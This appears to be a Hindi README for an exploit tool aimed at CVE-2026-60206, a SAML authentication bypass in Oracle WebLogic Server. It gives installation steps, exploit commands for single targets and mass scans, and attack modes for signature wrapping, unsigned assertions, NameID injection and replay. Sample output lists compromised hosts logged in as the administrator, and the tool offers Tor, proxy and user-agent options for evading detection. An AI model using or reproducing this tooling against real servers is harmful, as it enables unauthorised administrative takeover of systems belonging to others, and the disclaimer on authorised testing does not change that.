
CVE-2026-60206 के लिए तकनीकी विश्लेषण और Proof-of-Concept (PoC), जो Oracle WebLogic Server में SAML प्रमाणीकरण बायपास से संबंधित एक गंभीर भेद्यता है।
यह रिपॉजिटरी CVE‑2026‑60206 के लिए एक प्रूफ‑ऑफ‑कॉन्सेप्ट एक्सप्लॉइट प्रदान करती है, जो Oracle WebLogic Server के SAML कार्यान्वयन में एक गंभीर प्रमाणीकरण बाईपास भेद्यता है। यह दोष एक रिमोट, निम्न‑विशेषाधिकार प्राप्त हमलावर को SAML अभिकथन (assertions) जाली बनाकर सर्वर से पूरी तरह समझौता करने की अनुमति देता है।
⚠️ अस्वीकरण: यह टूल केवल अधिकृत सुरक्षा अनुसंधान और परीक्षण के लिए है। इसका उपयोग केवल उन्हीं प्रणालियों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं लेते हैं।
CVE-2026-60206 Oracle WebLogic Server के Core घटक को प्रभावित करती है। यह भेद्यता SAML प्रोटोकॉल कार्यान्वयन में अनुचित प्रमाणीकरण प्रबंधन से उत्पन्न होती है। कई हमले वैक्टर—जैसे XML सिग्नेचर रैपिंग (XSW), अहस्ताक्षरित अभिकथन स्वीकृति, NameID हेरफेर, और audience/conditions बाईपास—हमलावर को मनमाने उपयोगकर्ताओं (जैसे weblogic) का रूप धारण करने और प्रशासनिक पहुँच प्राप्त करने की अनुमति देते हैं।
प्रभावित संस्करण:
PoC निम्नलिखित हमले वैक्टर लागू करता है:
WantAssertionsSigned लागू नहीं है)।AudienceRestriction को हटाना या संशोधित करना।NotBefore/NotOnOrAfter में हेरफेर करना।all, unsigned, xsw, nameid, audience, conditions, combo, या replay में से चुनें।-l के माध्यम से)।-r)।httpx का उपयोग करता है, अन्यथा requests (HTTP/1.1) पर वापस आ जाता है।git clone https://github.com/Debajyoti0-0/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt
आवश्यक: requests, urllib3
वैकल्पिक (कार्यक्षमता में सुधार):
httpx – HTTP/2 समर्थन के लिएlxml – उन्नत SAML पार्सिंग के लिएsignxml, cryptography – सिग्नेचर हैंडलिंग के लिए (शोषण के लिए आवश्यक नहीं)python CVE-2026-60206.py -t https://192.168.1.100:7002 --detect
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode all -u weblogic
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode combo -u admin
python CVE-2026-60206.py -l targets.txt -o results.json
python CVE-2026-60206.py -l targets.txt --exploit -o results.csv --threads 20
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode replay --replay-file captured.xml
python CVE-2026-60206.py -t https://192.168.1.100:7002 --tor --check-tor
python CVE-2026-60206.py -t https://192.168.1.100:7002 -r request.txt --method POST
python CVE-2026-60206.py -t https://192.168.1.100:7002 -c
| फ्लैग | विवरण |
|---|---|
-t, --target TARGET | एकल लक्ष्य URL (जैसे, https://host:7002)। |
-l, --list LIST | मास स्कैन के लिए लक्ष्य सूची फ़ाइल, या एकल URL। |
-f, --file FILE |
-l के साथ):| फ्लैग | विवरण |
|---|---|
--exploit | अहस्ताक्षरित SAML अभिकथन का परीक्षण करें (डिफ़ॉल्ट: केवल पहचान)। |
-T, --threads THREADS | समवर्ती थ्रेड (डिफ़ॉल्ट: 10)। |
| फ्लैग | विवरण |
|---|---|
-v, --verbose | विस्तार बढ़ाएँ (डीबग आउटपुट)। |
-q, --quiet | गैर‑आवश्यक आउटपुट दबाएँ। |
detectसंस्करण पहचान और SAML एंडपॉइंट प्रोबिंग करता है। कोई हमला नहीं चलाया जाता।
unsignedपूरी तरह से अहस्ताक्षरित SAML अभिकथन इंजेक्ट करता है। यदि लक्ष्य WantAssertionsSigned लागू नहीं करता है, तो यह प्रमाणीकरण को पूरी तरह से बायपास कर देता है।
वेरिएंट: unsigned (डिफ़ॉल्ट), unsigned_stripped (सभी सिग्नेचर संदर्भ हटाता है)।
xsw (XML सिग्नेचर रैपिंग)एक वैध हस्ताक्षरित अभिकथन से पहले (या उसे लपेटकर) एक दुर्भावनापूर्ण अहस्ताक्षरित अभिकथन रखता है। SAML प्रोसेसर पहले अभिकथन को चुन सकता है जबकि सिग्नेचर सत्यापनकर्ता हस्ताक्षरित अभिकथन की जाँच करता है।
वेरिएंट: xsw1 (सरल प्रीपेंड), xsw2 (मूल के समान ID), xsw3 (नेस्टेड रैपर), xsw4 (सहोदर)।
nameidWebLogic के आइडेंटिटी मैपर को भ्रमित करने के लिए NameID फ़ील्ड में हेरफेर करता है, जिससे एक अलग उपयोगकर्ता का रूप धारण किया जा सकता है।
वेरिएंट: comment_injection, whitespace, format_confusion, xpath_injection।
audienceaudience तत्व को हटाकर या संशोधित करके AudienceRestriction जाँचों को बायपास करता है।
वेरिएंट: remove_audience, wildcard_audience, extra_audience।
conditionsसमय‑आधारित प्रतिबंधों को बायपास करता है (जैसे, NotBefore, NotOnOrAfter)।
वेरिएंट: future_timestamp, expired_timestamp, remove_conditions, infinite_validity।
comboXSW, अहस्ताक्षरित अभिकथन और NameID हेरफेर को एक पेलोड में जोड़ता है – पूर्ण समझौते के लिए सबसे संभावित वेक्टर।
वेरिएंट: combo_full (कमेंट इंजेक्शन के साथ), combo_stealth (न्यूलाइन के साथ)।
replayपहले से कैप्चर की गई SAML प्रतिक्रिया को दोबारा चलाता है, वैकल्पिक रूप से गंतव्य को संशोधित करता है या audience प्रतिबंध हटाता है।
वेरिएंट: replay_modified (Destination/Recipient समायोजित करता है), replay_cross_sp (audience प्रतिबंध हटाता है)।
$ python CVE-2026-60206.py -t https://192.168.1.100:7002 -u weblogic --mode combo
╔══════════════════════════════════════════════════════════════════════╗
║ CVE-2026-60206 — WebLogic SAML Authentication Bypass PoC ║
║ Oracle WebLogic Server Core | CVSS 9.9 | CWE-287 ║
╚══════════════════════════════════════════════════════════════════════╝
🔍 Detecting WebLogic version and SAML configuration...
Detected WebLogic version: 12.2.1.4.0
⚠️ Version 12.2.1.4.0 is IN SCOPE for CVE-2026-60206!
Found SAML metadata: /saml2/sp/metadata
Found SAML ACS: /saml2/sp/acs (HTTP 200)
============================================================
🚀 Starting comprehensive SAML attack suite
Target: https://192.168.1.100:7002
Target User: weblogic
============================================================
── Attack 1/2 ──
🎯 [combo/combo_full] Launching combined attack for: weblogic
✅ [combo/combo_full] Authentication bypass SUCCEEDED! Logged in as: weblogic
ACS Endpoint: /saml2/sp/acs
── Attack 2/2 ──
🎯 [combo/combo_stealth] Launching combined attack for: weblogic
✅ [combo/combo_stealth] Authentication bypass SUCCEEDED! Logged in as: weblogic
ACS Endpoint: /saml2/sp/acs
============================================================
📊 Results: 2/2 attack vectors succeeded
============================================================
EXPLOIT SUCCESSFUL! 2 attack(s) bypassed authentication.
- [combo/combo_full] → logged in as 'weblogic' via /saml2/sp/acs
- [combo/combo_stealth] → logged in as 'weblogic' via /saml2/sp/acs
📄 Report saved: logs/report_20260725_123456.json
$ python CVE-2026-60206.py -l targets.txt --exploit -o scan_results.csv --threads 10
============================================================
CVE-2026-60206 Mass Scanner
Targets: 50
Threads: 10
Mode: Exploit
============================================================
[10/50] 20.0% | Vuln:3 | Pwned:1 | 1.2 tgt/s
[!] VULN: https://10.0.0.5:7002 (12.2.1.4.0)
[!!] PWNED: https://10.0.0.5:7002 - logged in as weblogic
... (continues) ...
============================================================
SCAN SUMMARY
============================================================
Total targets: 50
Reachable: 45
WebLogic: 12
Vuln version: 8
Exploited: 3
Duration: 42.5s
============================================================
[!!] SUCCESSFULLY EXPLOITED:
https://10.0.0.5:7002 → weblogic via /saml2/sp/acs
https://10.0.0.10:7002 → weblogic via /saml2/sp/acs
https://10.0.0.15:7002 → weblogic via /saml2/sp/acs
[!] VULNERABLE VERSIONS (not yet exploited):
https://10.0.0.20:7002 (14.1.1.0.0)
https://10.0.0.25:7002 (15.1.1.0.0)
... (truncated)
इस PoC का सुरक्षित रूप से परीक्षण करने के लिए, SAML सक्षम और प्रभावित संस्करणों में से एक के साथ WebLogic Server सेट करें। उदाहरण के लिए, आप Docker का उपयोग कर सकते हैं:
# Example (simplified – use official Oracle WebLogic images with SAML configuration)
docker run -p 7002:7002 container-registry.oracle.com/middleware/weblogic:12.2.1.4
# Then configure SAML via WebLogic console or scripts
SAML कॉन्फ़िगरेशन में कम से कम एक SAML 2.0 सेवा प्रदाता शामिल होना चाहिए जिसमें ACS एंडपॉइंट (जैसे, /saml2/sp/acs) और प्रकाशित मेटाडेटा हो।
यह प्रोजेक्ट GNU v3.0 लाइसेंस के तहत लाइसेंस प्राप्त है – विवरण के लिए LICENSE फ़ाइल देखें।
मुद्दे (issues) और पुल रिक्वेस्ट का स्वागत है। कृपया सुनिश्चित करें कि आपके योगदान समान नैतिक उपयोग दिशानिर्देशों का पालन करते हैं।
याद रखें: किसी भी सुरक्षा टूल का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें। नैतिक बने रहें!
--save-payloads)।-c / --check) – शीघ्रता से निर्धारित करें कि लक्ष्य असुरक्षित है या नहीं (गैर‑शोषण)।| फ्लैग | विवरण |
|---|
-h, --help | सहायता संदेश दिखाएँ और बाहर निकलें। |
--proxy PROXY | प्रॉक्सी URL (--tor उपयोग किए जाने पर इसे ओवरराइड करता है)। |
--no-verify | SSL प्रमाणपत्र सत्यापन अक्षम करें। |
--cookie COOKIE | सत्र कुकी(ज़) (जैसे, name=value; name2=value2)। |
--auth AUTH | बेसिक प्रमाणीकरण क्रेडेंशियल (USER:PASS)। |
--list का उपनाम। |
| फ्लैग | विवरण |
|---|
-r, --requestfile REQUESTFILE | फ़ाइल से रॉ HTTP अनुरोध लोड करें (SAML हमलों को प्रतिस्थापित करता है)। |
--method METHOD | उपयोग करने के लिए HTTP विधि (रॉ अनुरोध या एकल अनुरोध के लिए; डिफ़ॉल्ट: GET)। |
--random-agent | अंतर्निहित सूची से यादृच्छिक User‑Agent का उपयोग करें। |
-A, --user-agent USER_AGENT | कस्टम User‑Agent हेडर मान। |
--tor | Tor गुमनामी नेटवर्क का उपयोग करें (डिफ़ॉल्ट रूप से SOCKS5)। |
--tor-port TOR_PORT | Tor प्रॉक्सी पोर्ट (डिफ़ॉल्ट: 9050)। |
--tor-type {HTTP,SOCKS4,SOCKS5} | Tor प्रॉक्सी प्रकार (डिफ़ॉल्ट: SOCKS5)। |
--check-tor | जाँचें कि Tor सही ढंग से उपयोग हो रहा है या नहीं (निर्णय के साथ बाहर निकलता है)। |
--delay DELAY | प्रत्येक अनुरोध के बीच सेकंड में विलंब। |
--timeout TIMEOUT | सेकंड में टाइमआउट (डिफ़ॉल्ट: 30)। |
--retries RETRIES | टाइमआउट/त्रुटियों पर रीट्राय की संख्या (डिफ़ॉल्ट: 3)। |
--retry-on RETRY_ON | यदि प्रतिक्रिया सामग्री regex से मेल खाती है तो अनुरोध दोबारा करें (जैसे, 'captcha')। |
-dr, --disable-redirects | HTTP रीडायरेक्ट का अनुसरण अक्षम करें। |
| फ्लैग | विवरण |
|---|
-m, --mode {all,detect,unsigned,xsw,nameid,audience,conditions,combo,replay} | हमला मोड (डिफ़ॉल्ट: all)। |
--detect | केवल WebLogic संस्करण और SAML कॉन्फ़िगरेशन का पता लगाएँ (कोई हमला नहीं)। |
-c, --check | त्वरित भेद्यता जाँच (केवल पहचान, निर्णय के साथ बाहर निकलें)। |
-u, --user USER | रूप धारण करने के लिए लक्ष्य उपयोगकर्ता (डिफ़ॉल्ट: weblogic)। |
--groups GROUPS | SAML अभिकथन में शामिल करने के लिए समूह (डिफ़ॉल्ट: Administrators,Monitors)। |
--issuer ISSUER | SAML जारीकर्ता इकाई ID। |
--audience AUDIENCE | SAML Audience इकाई ID। |
--relay-state RELAY_STATE | SAML POST के लिए RelayState पैरामीटर। |
--base64 | POST में SAML प्रतिक्रिया को Base64‑एनकोड करें। |
--extra-attrs [NAME=VALUE ...] | अतिरिक्त SAML विशेषताएँ (जैसे, role=admin)। |
--replay-file REPLAY_FILE | रीप्ले के लिए कैप्चर की गई SAML प्रतिक्रिया का पथ। |
--save-payloads | उत्पन्न SAML पेलोड को ./payloads/ में सहेजें। |
--continue-on-success | सफल हमले के बाद परीक्षण जारी रखें। |
--list-modes | विवरण के साथ सभी हमले मोड सूचीबद्ध करें और बाहर निकलें। |
-o, --output OUTPUT | JSON या CSV रिपोर्ट फ़ाइल में लिखें। |